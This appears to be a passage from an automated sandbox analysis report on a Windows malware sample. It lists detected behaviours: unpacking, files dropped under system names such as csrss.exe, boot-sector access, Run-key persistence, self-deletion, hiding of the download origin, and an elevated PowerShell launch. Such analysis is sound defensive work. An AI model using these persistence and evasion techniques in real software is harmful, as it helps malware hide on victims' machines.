                Source: C:\Users\user\AppData\Local\Temp\is-5EQGI.tmp\1EB9.tmpWindow found: window name: TMainForm
                Source: Window RecorderWindow detected: More than 3 window changes detected
                Source: C:\Users\user\AppData\Local\Temp\356F.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
                Source: C:\Users\user\AppData\Local\Temp\nsx5151.tmpKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\13.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001
                Source: C:\Users\user\Desktop\S23UhdW5DH.exeFile opened: C:\Windows\SysWOW64\msvcr100.dllJump to behavior
                Source: S23UhdW5DH.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                Source: Binary string: C:\viweyaxehara hojicikepuxe\vosi\cavadelawi74\gizagol\res.pdb source: S23UhdW5DH.exe, 00000000.00000000.2058707940.0000000000427000.00000002.00000001.01000000.00000003.sdmp, S23UhdW5DH.exe, 00000000.00000002.2135326441.0000000000427000.00000002.00000001.01000000.00000003.sdmp, rghwvve, 00000006.00000000.2330117193.0000000000427000.00000002.00000001.01000000.00000005.sdmp, rghwvve, 00000006.00000002.2410440238.0000000000427000.00000002.00000001.01000000.00000005.sdmp

                Data Obfuscation

                barindex
                Detected unpacking (changes PE section rights)
                Source: C:\Users\user\Desktop\S23UhdW5DH.exeUnpacked PE file: 0.2.S23UhdW5DH.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:EW;
                Source: C:\Users\user\AppData\Roaming\rghwvveUnpacked PE file: 6.2.rghwvve.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:EW;
                Source: C:\Users\user\AppData\Local\VB Smart Card Viewer\vbsmartcardviewer.exeUnpacked PE file: 26.2.vbsmartcardviewer.exe.400000.0.unpack .text:EW;.rdata:R;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.vmp0:ER;.rsrc:R;
                Source: C:\Users\user\AppData\Local\VB Smart Card Viewer\vbsmartcardviewer.exeUnpacked PE file: 29.2.vbsmartcardviewer.exe.400000.0.unpack .text:EW;.rdata:R;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.vmp0:ER;.rsrc:R;
                Source: C:\Users\user\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exeUnpacked PE file: 30.2.288c47bbc1871b439df19ff4df68f076.exe.400000.4.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.idata:W;.reloc:R;.symtab:R;
                Source: C:\Users\user\AppData\Local\Temp\nsx5151.tmpUnpacked PE file: 43.2.nsx5151.tmp.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:EW;.rdata:R;.data:W;.reloc:R;
                Detected unpacking (overwrites its own PE header)
                Source: C:\Users\user\AppData\Local\VB Smart Card Viewer\vbsmartcardviewer.exeUnpacked PE file: 26.2.vbsmartcardviewer.exe.400000.0.unpack
                Source: C:\Users\user\AppData\Local\VB Smart Card Viewer\vbsmartcardviewer.exeUnpacked PE file: 29.2.vbsmartcardviewer.exe.400000.0.unpack
                Source: C:\Users\user\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exeUnpacked PE file: 30.2.288c47bbc1871b439df19ff4df68f076.exe.400000.4.unpack
                Source: C:\Users\user\AppData\Local\Temp\nsx5151.tmpUnpacked PE file: 43.2.nsx5151.tmp.400000.0.unpack
                Suspicious powershell command line found
                Source: C:\Users\user\AppData\Local\Temp\FourthX.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Start-Process "C:\Users\user\AppData\Local\Temp\FourthX.exe" -Verb runAs
                Source: C:\Users\user\AppData\Local\Temp\FourthX.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Start-Process "C:\Users\user\AppData\Local\Temp\FourthX.exe" -Verb runAs
                Source: C:\Users\user\AppData\Local\Temp\572.exeCode function: 8_2_005CB070 LoadLibraryW,GetProcAddress,VirtualProtect,8_2_005CB070
                Source: initial sampleStatic PE information: section where entry point is pointing to: .vmp@3
                Source: 1EB9.exe.2.drStatic PE information: real checksum: 0x0 should be: 0x754f9c
                Source: vbsmartcardviewer.exe.21.drStatic PE information: real checksum: 0x0 should be: 0x2f219e
                Source: vueqjgslwynd.exe.42.drStatic PE information: real checksum: 0x0 should be: 0x29585f
                Source: 1199.dll.2.drStatic PE information: real checksum: 0x0 should be: 0x1feacf
                Source: ObjectSerialization65.exe.26.drStatic PE information: real checksum: 0x0 should be: 0x2f219e
                Source: is-C4TNB.tmp.21.drStatic PE information: real checksum: 0x0 should be: 0xb015d
                Source: _iscrypt.dll.21.drStatic PE information: real checksum: 0x0 should be: 0x89d2
                Source: INetC.dll.31.drStatic PE information: real checksum: 0x0 should be: 0x69a0
                Source: FourthX.exe.27.drStatic PE information: real checksum: 0x0 should be: 0x29585f
                Source: 1EB9.tmp.20.drStatic PE information: real checksum: 0x0 should be: 0xb389e
                Source: 356F.exe.2.drStatic PE information: real checksum: 0x0 should be: 0x8be514
                Source: 288c47bbc1871b439df19ff4df68f076.exe.27.drStatic PE information: real checksum: 0x420b8d should be: 0x42c6e2
                Source: _RegDLL.tmp.21.drStatic PE information: real checksum: 0x0 should be: 0xc2b7
                Source: BroomSetup.exe.31.drStatic PE information: real checksum: 0x0 should be: 0x4cbbf8
                Source: 1EB9.tmp.17.drStatic PE information: real checksum: 0x0 should be: 0xb389e
                Source: _isdecmp.dll.21.drStatic PE information: real checksum: 0x0 should be: 0x123ff
                Source: _setup64.tmp.21.drStatic PE information: real checksum: 0x0 should be: 0x8546
                Source: InstallSetup4.exe.27.drStatic PE information: real checksum: 0x0 should be: 0x20eded
                Source: 1199.dll.2.drStatic PE information: section name: nqb
                Source: 1199.dll.2.drStatic PE information: section name: .qdata
                Source: 1199.dll.2.drStatic PE information: section name: xcg
                Source: 1199.dll.2.drStatic PE information: section name: HIcf6ht
                Source: FE8B.exe.2.drStatic PE information: section name: .vmp@3
                Source: FE8B.exe.2.drStatic PE information: section name: .vmp@3
                Source: FE8B.exe.2.drStatic PE information: section name: .vmp@3
                Source: 572.exe.2.drStatic PE information: section name: .fofufe
                Source: 572.exe.2.drStatic PE information: section name: .safaz
                Source: csrss.exe.9.drStatic PE information: section name: .fofufe
                Source: csrss.exe.9.drStatic PE information: section name: .safaz
                Source: is-S9GPV.tmp.21.drStatic PE information: section name: /4
                Source: is-1HD49.tmp.21.drStatic PE information: section name: /4
                Source: is-GIJA5.tmp.21.drStatic PE information: section name: /4
                Source: is-IJL2N.tmp.21.drStatic PE information: section name: /4
                Source: is-13K5P.tmp.21.drStatic PE information: section name: /4
                Source: is-1P6UB.tmp.21.drStatic PE information: section name: /4
                Source: is-IJ17E.tmp.21.drStatic PE information: section name: /4
                Source: is-OFQS5.tmp.21.drStatic PE information: section name: /4
                Source: is-0PI80.tmp.21.drStatic PE information: section name: /4
                Source: is-VN2OC.tmp.21.drStatic PE information: section name: /4
                Source: is-A87KG.tmp.21.drStatic PE information: section name: /4
                Source: is-F43KE.tmp.21.drStatic PE information: section name: /4
                Source: is-399KA.tmp.21.drStatic PE information: section name: /4
                Source: FourthX.exe.27.drStatic PE information: section name: .00cfg
                Source: BroomSetup.exe.31.drStatic PE information: section name: .didata
                Source: vueqjgslwynd.exe.42.drStatic PE information: section name: .00cfg
                Source: freebl3[1].dll.43.drStatic PE information: section name: .00cfg
                Source: mozglue.dll.43.drStatic PE information: section name: .00cfg
                Source: mozglue[1].dll.43.drStatic PE information: section name: .00cfg
                Source: msvcp140.dll.43.drStatic PE information: section name: .didat
                Source: msvcp140[1].dll.43.drStatic PE information: section name: .didat
                Source: nss3.dll.43.drStatic PE information: section name: .00cfg
                Source: nss3[1].dll.43.drStatic PE information: section name: .00cfg
                Source: softokn3.dll.43.drStatic PE information: section name: .00cfg
                Source: softokn3[1].dll.43.drStatic PE information: section name: .00cfg
                Source: freebl3.dll.43.drStatic PE information: section name: .00cfg
                Source: C:\Windows\explorer.exeProcess created: C:\Windows\System32\regsvr32.exe regsvr32 /s C:\Users\user\AppData\Local\Temp\1199.dll
                Source: C:\Users\user\Desktop\S23UhdW5DH.exeCode function: 0_2_00403253 push eax; ret 0_2_0040332D
                Source: C:\Users\user\Desktop\S23UhdW5DH.exeCode function: 0_2_00401C64 push es; retf 0_2_00401C83
                Source: C:\Users\user\Desktop\S23UhdW5DH.exeCode function: 0_2_0040332A push eax; ret 0_2_0040332D
                Source: C:\Users\user\Desktop\S23UhdW5DH.exeCode function: 0_2_00402F91 push 60B44389h; retf 0_2_00402FAB
                Source: C:\Users\user\Desktop\S23UhdW5DH.exeCode function: 0_2_00551CCB push es; retf 0_2_00551CEA
                Source: C:\Users\user\Desktop\S23UhdW5DH.exeCode function: 0_2_00552FF8 push 60B44389h; retf 0_2_00553012
                Source: C:\Users\user\AppData\Roaming\rghwvveCode function: 6_2_00403253 push eax; ret 6_2_0040332D
                Source: C:\Users\user\AppData\Roaming\rghwvveCode function: 6_2_00401C64 push es; retf 6_2_00401C83
                Source: C:\Users\user\AppData\Roaming\rghwvveCode function: 6_2_0040332A push eax; ret 6_2_0040332D
                Source: C:\Users\user\AppData\Roaming\rghwvveCode function: 6_2_00402F91 push 60B44389h; retf 6_2_00402FAB
                Source: C:\Users\user\AppData\Roaming\rghwvveCode function: 6_2_004C1CCB push es; retf 6_2_004C1CEA
                Source: C:\Users\user\AppData\Roaming\rghwvveCode function: 6_2_004C2FF8 push 60B44389h; retf 6_2_004C3012
                Source: C:\Users\user\AppData\Local\Temp\FE8B.exeCode function: 7_2_008BC713 push 8C34D431h; mov dword ptr [esp], edx7_2_008BC718
                Source: C:\Users\user\AppData\Local\Temp\572.exeCode function: 8_2_005CB960 push ecx; mov dword ptr [esp], 000343F0h8_2_005CB961
                Source: C:\Users\user\AppData\Local\Temp\572.exeCode function: 8_2_00401E25 push ecx; ret 8_2_00401E38
                Source: C:\Users\user\AppData\Local\Temp\572.exeCode function: 8_2_0248A2EF push ebx; iretd 8_2_0248A2F7
                Source: C:\Users\user\AppData\Local\Temp\572.exeCode function: 8_2_024DE70A pushad ; ret 8_2_024DE70C
                Source: C:\Users\user\AppData\Local\Temp\572.exeCode function: 8_2_0257C7F8 push edx; retf 8_2_0257C7F9
                Source: C:\Users\user\AppData\Local\Temp\572.exeCode function: 8_2_025447ED push ebp; retf 8_2_025447EE
                Source: C:\Users\user\AppData\Local\Temp\572.exeCode function: 8_2_0254480A push 5A36841Dh; retf 8_2_02544825
                Source: C:\Users\user\AppData\Local\Temp\572.exeCode function: 8_2_0257C4BD push cs; ret 8_2_0257C4BE
                Source: C:\Users\user\AppData\Local\Temp\572.exeCode function: 8_2_023D1DA3 push esi; retf 8_2_023D1DA4
                Source: C:\Users\user\AppData\Local\Temp\572.exeCode function: 9_2_00696299 push ecx; ret 9_2_006962AC
                Source: C:\Users\user\AppData\Local\Temp\93B.exeCode function: 10_2_0040A3BD push eax; retf 10_2_0040A3BE
                Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 14_2_03143097 push ecx; iretd 14_2_03143128
                Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 14_2_031430EE push ecx; iretd 14_2_0314311A
                Source: C:\Users\user\AppData\Local\Temp\93B.exeCode function: 16_2_0040A3BD push eax; retf 16_2_0040A3BE
                Source: C:\Users\user\AppData\Local\Temp\1EB9.exeCode function: 17_2_004065B8 push 004065F5h; ret 17_2_004065ED
                Source: C:\Users\user\AppData\Local\Temp\1EB9.exeCode function: 17_2_004040B5 push eax; ret 17_2_004040F1
                Source: C:\Users\user\AppData\Local\Temp\1EB9.exeCode function: 17_2_00408104 push ecx; mov dword ptr [esp], eax17_2_00408109
                Source: C:\Users\user\AppData\Local\Temp\1EB9.exeCode function: 17_2_00404185 push 00404391h; ret 17_2_00404389
                Source: S23UhdW5DH.exeStatic PE information: section name: .text entropy: 7.661739793438813
                Source: 1199.dll.2.drStatic PE information: section name: .text entropy: 7.997734235058858
                Source: 572.exe.2.drStatic PE information: section name: .text entropy: 7.985255731332923
                Source: 66E0.exe.2.drStatic PE information: section name: .text entropy: 7.426788155330278
                Source: rghwvve.2.drStatic PE information: section name: .text entropy: 7.661739793438813
                Source: csrss.exe.9.drStatic PE information: section name: .text entropy: 7.985255731332923
                Source: syncUpd[1].exe.31.drStatic PE information: section name: .text entropy: 7.476611299848768
                Source: nsx5151.tmp.31.drStatic PE information: section name: .text entropy: 7.476611299848768

                Persistence and Installation Behavior

                barindex
                Contains functionality to infect the boot sector
                Source: C:\Users\user\AppData\Local\Temp\93B.exeCode function: CreateFileA,DeviceIoControl, \\.\PHYSICALDRIVE010_2_00408951
                Source: C:\Users\user\AppData\Local\Temp\93B.exeCode function: CreateFileA,DeviceIoControl, PHYSICALDRIVE010_2_00408951
                Source: C:\Users\user\AppData\Local\Temp\93B.exeCode function: CreateFileA,DeviceIoControl, \\.\PHYSICALDRIVE010_2_00408958
                Source: C:\Users\user\AppData\Local\Temp\93B.exeCode function: CreateFileA,DeviceIoControl, PHYSICALDRIVE010_2_00408958
                Source: C:\Users\user\AppData\Local\Temp\93B.exeCode function: CreateFileA,DeviceIoControl, \\.\PHYSICALDRIVE010_2_0040895B
                Source: C:\Users\user\AppData\Local\Temp\93B.exeCode function: CreateFileA,DeviceIoControl, PHYSICALDRIVE010_2_0040895B
                Source: C:\Users\user\AppData\Local\Temp\93B.exeCode function: FindCloseChangeNotification,CreateFileA,DeviceIoControl, \\.\PHYSICALDRIVE016_2_0040895B
                Source: C:\Users\user\AppData\Local\Temp\93B.exeCode function: FindCloseChangeNotification,CreateFileA,DeviceIoControl, PHYSICALDRIVE016_2_0040895B
                Source: C:\Users\user\AppData\Local\Temp\93B.exeCode function: FindCloseChangeNotification,CreateFileA,DeviceIoControl, \\.\PHYSICALDRIVE016_2_00408951
                Source: C:\Users\user\AppData\Local\Temp\93B.exeCode function: FindCloseChangeNotification,CreateFileA,DeviceIoControl, PHYSICALDRIVE016_2_00408951
                Source: C:\Users\user\AppData\Local\Temp\93B.exeCode function: FindCloseChangeNotification,CreateFileA,DeviceIoControl, \\.\PHYSICALDRIVE016_2_00408958
                Source: C:\Users\user\AppData\Local\Temp\93B.exeCode function: FindCloseChangeNotification,CreateFileA,DeviceIoControl, PHYSICALDRIVE016_2_00408958
                Drops PE files with benign system names
                Source: C:\Users\user\AppData\Local\Temp\572.exeFile created: C:\ProgramData\Drivers\csrss.exeJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-5EQGI.tmp\1EB9.tmpFile created: C:\Users\user\AppData\Local\Temp\is-EHUIS.tmp\_isetup\_RegDLL.tmpJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\FourthX.exeFile created: C:\ProgramData\xcfonrchdkar\vueqjgslwynd.exeJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\nsx5151.tmpFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\freebl3[1].dllJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\nsx5151.tmpFile created: C:\ProgramData\mozglue.dllJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-5EQGI.tmp\1EB9.tmpFile created: C:\Users\user\AppData\Local\VB Smart Card Viewer\is-1P6UB.tmpJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-5EQGI.tmp\1EB9.tmpFile created: C:\Users\user\AppData\Local\VB Smart Card Viewer\is-HCHL2.tmpJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\InstallSetup4.exeFile created: C:\Users\user\AppData\Local\Temp\nss46EF.tmp\INetC.dllJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-5EQGI.tmp\1EB9.tmpFile created: C:\Users\user\AppData\Local\VB Smart Card Viewer\avcodec-58.dll (copy)Jump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\1EB9.exeFile created: C:\Users\user\AppData\Local\Temp\is-5EQGI.tmp\1EB9.tmpJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-5EQGI.tmp\1EB9.tmpFile created: C:\Users\user\AppData\Local\VB Smart Card Viewer\avutil-56.dll (copy)Jump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\nsx5151.tmpFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\nss3[1].dllJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-5EQGI.tmp\1EB9.tmpFile created: C:\Users\user\AppData\Local\VB Smart Card Viewer\SDL2.dll (copy)Jump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\nsx5151.tmpFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\msvcp140[1].dllJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-5EQGI.tmp\1EB9.tmpFile created: C:\Users\user\AppData\Local\VB Smart Card Viewer\libogg-0.dll (copy)Jump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\nsx5151.tmpFile created: C:\ProgramData\softokn3.dllJump to dropped file
                Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Roaming\rghwvveJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-5EQGI.tmp\1EB9.tmpFile created: C:\Users\user\AppData\Local\VB Smart Card Viewer\is-399KA.tmpJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\nsx5151.tmpFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\softokn3[1].dllJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-5EQGI.tmp\1EB9.tmpFile created: C:\Users\user\AppData\Local\VB Smart Card Viewer\libgcc_s_dw2-1.dll (copy)Jump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\nsx5151.tmpFile created: C:\ProgramData\nss3.dllJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-5EQGI.tmp\1EB9.tmpFile created: C:\Users\user\AppData\Local\VB Smart Card Viewer\libiconv-2.dll (copy)Jump to dropped file
                Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\FE8B.exeJump to dropped file
                Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\356F.exeJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-5EQGI.tmp\1EB9.tmpFile created: C:\Users\user\AppData\Local\VB Smart Card Viewer\avformat-58.dll (copy)Jump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-5EQGI.tmp\1EB9.tmpFile created: C:\Users\user\AppData\Local\VB Smart Card Viewer\is-OFQS5.tmpJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-5EQGI.tmp\1EB9.tmpFile created: C:\Users\user\AppData\Local\VB Smart Card Viewer\unins000.exe (copy)Jump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\nsx5151.tmpFile created: C:\ProgramData\freebl3.dllJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\572.exeFile created: C:\ProgramData\Drivers\csrss.exeJump to dropped file
                Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\66E0.exeJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-5EQGI.tmp\1EB9.tmpFile created: C:\Users\user\AppData\Local\VB Smart Card Viewer\libvorbisenc-2.dll (copy)Jump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-5EQGI.tmp\1EB9.tmpFile created: C:\Users\user\AppData\Local\VB Smart Card Viewer\is-1HD49.tmpJump to dropped file
                Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\93B.exeJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-5EQGI.tmp\1EB9.tmpFile created: C:\Users\user\AppData\Local\VB Smart Card Viewer\is-13K5P.tmpJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\InstallSetup4.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\syncUpd[1].exeJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-5EQGI.tmp\1EB9.tmpFile created: C:\Users\user\AppData\Local\VB Smart Card Viewer\is-GIJA5.tmpJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\nsx5151.tmpFile created: C:\ProgramData\msvcp140.dllJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-5EQGI.tmp\1EB9.tmpFile created: C:\Users\user\AppData\Local\VB Smart Card Viewer\libvorbis-0.dll (copy)Jump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-5EQGI.tmp\1EB9.tmpFile created: C:\Users\user\AppData\Local\VB Smart Card Viewer\zlib1.dll (copy)Jump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\InstallSetup4.exeFile created: C:\Users\user\AppData\Local\Temp\nsx5151.tmpJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-5EQGI.tmp\1EB9.tmpFile created: C:\Users\user\AppData\Local\VB Smart Card Viewer\libwinpthread-1.dll (copy)Jump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-5EQGI.tmp\1EB9.tmpFile created: C:\Users\user\AppData\Local\Temp\is-EHUIS.tmp\_isetup\_setup64.tmpJump to dropped file
                Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\1199.dllJump to dropped file
                Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\1EB9.exeJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\nsx5151.tmpFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\vcruntime140[1].dllJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-5EQGI.tmp\1EB9.tmpFile created: C:\Users\user\AppData\Local\Temp\is-EHUIS.tmp\_isetup\_isdecmp.dllJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\nsx5151.tmpFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\mozglue[1].dllJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-5EQGI.tmp\1EB9.tmpFile created: C:\Users\user\AppData\Local\VB Smart Card Viewer\is-C4TNB.tmpJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\nsx5151.tmpFile created: C:\ProgramData\vcruntime140.dllJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\356F.exeFile created: C:\Users\user\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exeJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-5EQGI.tmp\1EB9.tmpFile created: C:\Users\user\AppData\Local\VB Smart Card Viewer\libbz2-1.dll (copy)Jump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-5EQGI.tmp\1EB9.tmpFile created: C:\Users\user\AppData\Local\VB Smart Card Viewer\is-IJL2N.tmpJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-5EQGI.tmp\1EB9.tmpFile created: C:\Users\user\AppData\Local\VB Smart Card Viewer\is-0PI80.tmpJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\356F.exeFile created: C:\Users\user\AppData\Local\Temp\FourthX.exeJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-5EQGI.tmp\1EB9.tmpFile created: C:\Users\user\AppData\Local\VB Smart Card Viewer\is-IJ17E.tmpJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-5EQGI.tmp\1EB9.tmpFile created: C:\Users\user\AppData\Local\VB Smart Card Viewer\is-F43KE.tmpJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\356F.exeFile created: C:\Users\user\AppData\Local\Temp\InstallSetup4.exeJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\InstallSetup4.exeFile created: C:\Users\user\AppData\Local\Temp\BroomSetup.exeJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-5EQGI.tmp\1EB9.tmpFile created: C:\Users\user\AppData\Local\Temp\is-EHUIS.tmp\_isetup\_iscrypt.dllJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-5EQGI.tmp\1EB9.tmpFile created: C:\Users\user\AppData\Local\VB Smart Card Viewer\swresample-3.dll (copy)Jump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-5EQGI.tmp\1EB9.tmpFile created: C:\Users\user\AppData\Local\Temp\is-EHUIS.tmp\_isetup\_shfoldr.dllJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-5EQGI.tmp\1EB9.tmpFile created: C:\Users\user\AppData\Local\VB Smart Card Viewer\is-S9GPV.tmpJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-5EQGI.tmp\1EB9.tmpFile created: C:\Users\user\AppData\Local\VB Smart Card Viewer\is-A87KG.tmpJump to dropped file
                Source: C:\Users\user\AppData\Local\VB Smart Card Viewer\vbsmartcardviewer.exeFile created: C:\ProgramData\ObjectSerialization65\ObjectSerialization65.exeJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-5EQGI.tmp\1EB9.tmpFile created: C:\Users\user\AppData\Local\VB Smart Card Viewer\is-VN2OC.tmpJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\1EB9.exeFile created: C:\Users\user\AppData\Local\Temp\is-SUAE2.tmp\1EB9.tmpJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-5EQGI.tmp\1EB9.tmpFile created: C:\Users\user\AppData\Local\VB Smart Card Viewer\vbsmartcardviewer.exeJump to dropped file
                Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\572.exeJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\FourthX.exeFile created: C:\ProgramData\xcfonrchdkar\vueqjgslwynd.exeJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\nsx5151.tmpFile created: C:\ProgramData\mozglue.dllJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\nsx5151.tmpFile created: C:\ProgramData\nss3.dllJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\nsx5151.tmpFile created: C:\ProgramData\msvcp140.dllJump to dropped file
                Source: C:\Users\user\AppData\Local\VB Smart Card Viewer\vbsmartcardviewer.exeFile created: C:\ProgramData\ObjectSerialization65\ObjectSerialization65.exeJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\nsx5151.tmpFile created: C:\ProgramData\freebl3.dllJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\572.exeFile created: C:\ProgramData\Drivers\csrss.exeJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\nsx5151.tmpFile created: C:\ProgramData\vcruntime140.dllJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\nsx5151.tmpFile created: C:\ProgramData\softokn3.dllJump to dropped file
                Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Roaming\rghwvveJump to dropped file

                Boot Survival

                barindex
                Contains functionality to infect the boot sector
                Source: C:\Users\user\AppData\Local\Temp\93B.exeCode function: CreateFileA,DeviceIoControl, \\.\PHYSICALDRIVE010_2_00408951
                Source: C:\Users\user\AppData\Local\Temp\93B.exeCode function: CreateFileA,DeviceIoControl, PHYSICALDRIVE010_2_00408951
                Source: C:\Users\user\AppData\Local\Temp\93B.exeCode function: CreateFileA,DeviceIoControl, \\.\PHYSICALDRIVE010_2_00408958
                Source: C:\Users\user\AppData\Local\Temp\93B.exeCode function: CreateFileA,DeviceIoControl, PHYSICALDRIVE010_2_00408958
                Source: C:\Users\user\AppData\Local\Temp\93B.exeCode function: CreateFileA,DeviceIoControl, \\.\PHYSICALDRIVE010_2_0040895B
                Source: C:\Users\user\AppData\Local\Temp\93B.exeCode function: CreateFileA,DeviceIoControl, PHYSICALDRIVE010_2_0040895B
                Source: C:\Users\user\AppData\Local\Temp\93B.exeCode function: FindCloseChangeNotification,CreateFileA,DeviceIoControl, \\.\PHYSICALDRIVE016_2_0040895B
                Source: C:\Users\user\AppData\Local\Temp\93B.exeCode function: FindCloseChangeNotification,CreateFileA,DeviceIoControl, PHYSICALDRIVE016_2_0040895B
                Source: C:\Users\user\AppData\Local\Temp\93B.exeCode function: FindCloseChangeNotification,CreateFileA,DeviceIoControl, \\.\PHYSICALDRIVE016_2_00408951
                Source: C:\Users\user\AppData\Local\Temp\93B.exeCode function: FindCloseChangeNotification,CreateFileA,DeviceIoControl, PHYSICALDRIVE016_2_00408951
                Source: C:\Users\user\AppData\Local\Temp\93B.exeCode function: FindCloseChangeNotification,CreateFileA,DeviceIoControl, \\.\PHYSICALDRIVE016_2_00408958
                Source: C:\Users\user\AppData\Local\Temp\93B.exeCode function: FindCloseChangeNotification,CreateFileA,DeviceIoControl, PHYSICALDRIVE016_2_00408958
                Source: C:\Users\user\AppData\Local\Temp\572.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run CSRSSJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\572.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run CSRSSJump to behavior

                Hooking and other Techniques for Hiding and Protection

                barindex
                Deletes itself after installation
                Source: C:\Windows\explorer.exeFile deleted: c:\users\user\desktop\s23uhdw5dh.exeJump to behavior
                Hides that the sample has been downloaded from the Internet (zone.identifier)
                Source: C:\Windows\explorer.exeFile opened: C:\Users\user\AppData\Roaming\rghwvve:Zone.Identifier read attributes | deleteJump to behavior
                Overwrites code with unconditional jumps - possibly settings hooks in foreign process
